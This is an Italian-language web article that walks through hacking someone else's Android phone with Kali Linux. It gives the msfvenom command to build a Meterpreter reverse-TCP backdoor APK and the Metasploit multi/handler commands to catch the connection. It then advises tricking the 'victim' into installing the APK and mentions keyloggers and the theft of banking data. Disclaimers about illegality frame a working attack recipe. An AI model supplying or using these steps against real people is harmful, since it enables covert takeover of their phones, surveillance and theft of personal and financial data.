Hackerare un telefono Android con Kali Linux con un minimo di impegno, può essere alla portata di tutti. Si tratta di una operazione illegale, in quanto è possibile accedere ai file personali della “vittima”, senza il suo esplicito consenso.
Questa guida infatti, non è stata realizzata con l’intenzione di penetrare gli smartphone altrui, piuttosto come semplice curiosità del mondo informatico e soprattutto, come conoscere i sistemi attraverso il quale potreste essere raggirati ed hackerati.
Come usare Kali Linux per impadronirsi di uno smartphone Android
Il primo step (è quello che chiaramente ci si aspetta), è di dover installare obbligatoriamente l’app di penetration testing, Kali Linux. Naturalmente il cellulare della vittima dovrà possedere un device Android, viceversa questa procedura risulterà nulla.
Una volta avviato il terminale post installazione, ecco il comando che sarà indispensabile da inserire:
msfvenom -p android/meterpreter/reverse_tcp LHOST=”inserire il proprio IP locale” LPORT=”digitare la porta personale locale” R > “inserire il nome della backdoor”.apk
Conoscere l’indirizzo IP di appartenenza non è affatto complesso. Senza chiudere quest’ultimo terminale, apritene un altro e scrivere al suo interno “ifconfig”.
Mentre come porta potreste utilizzare senza alcun problema quella di default, ovvero la 443.
La prima operazione è stata finalizzata per ottenere la backdoor, che se sarà stata generata correttamente si posizionerà all’interno della cartella “home”. Per comodità suggeriamo di spostarla nel desktop.
Fatto ciò, non resta che aprire metasploit attraverso lo specifico comando in questione “msfconsole”.
Il prossimo step sarà quello di inserire una serie di comandi, che illustriamo qui di seguito:
- use multi/handler
- set PAYLOAD android/meterpreter/reverse_tcp
- poi set LHOST “qui va inserito il proprio indirizzo IP locale” in pratica è l’indirizzo IP identico a quello inserito precedentemente)
- set LPORT “va digitata la propria porta local” (anche stavolta dovrà essere inserita il numero di porta digitato in precedenza, ovvero inizialmente)
- show options
- exploit
Il punto più “difficile”, ovvero dove ci vorrà creatività, sarà quello di invogliare la vittima ad installare questa backdoor appena creata.
Se la connessione tra i due dispositivi dovesse avvenire correttamente, non si sarà fatto altro che aver generato un gateway. Si intende una comunicazione informatica tra due device, dove uno sarebbe in grado di poter penetrare all’interno l’altro grazie alla connessione appena stabilita.
Comandi Kali Linux da usare su un device Android
Esistono molteplici comandi che Kali Linux consente di utilizzare. Ma naturalmente essendo davvero molto vasti, sarebbe impossibile conoscerli tutti a memoria.
Per poter avere una linea guida su questi comandi, basterà aprire il terminale e digitare “help”. Uscirà una lista piena di comandi da poter dare al telefono Android e lui li eseguirà istantaneamente.
Aver installato una backdoor su un dispositivo Android, significa poter entrare liberamente in qualsiasi file si voglia, ma soprattutto poter avere pieno controllo di quest’ultimo.
Per legge, ricordiamo che si tratta di una azione illecita. Si tratterebbe a tutti gli effetti di furto, in quanto si accede a dei file personali senza aver alcun tipo di consenso (soprattutto quelli delicati come potrebbero essere quelli bancari).
Il più delle volte, chi si diletta a fare hacking con Kali Linux, lo fa installando dei keylogger, rubando dati personali (anche bancari) o semplicemente “divertendosi” mettendosi in contatto con la cerchia di amicizia della vittima tramite i social network.
Indipendentemente dall’uso finale, l’azione ribadiamo che è illegale ed è punita severamente per legge.
Il fatto più grave potrebbe essere l’utilizzo di un futuro keylogger, in quanto va a registrare tutto quel che viene digitato dalla vittima sul suo smartphone (senza nessun tipo di limite sulle applicazioni del cellulare).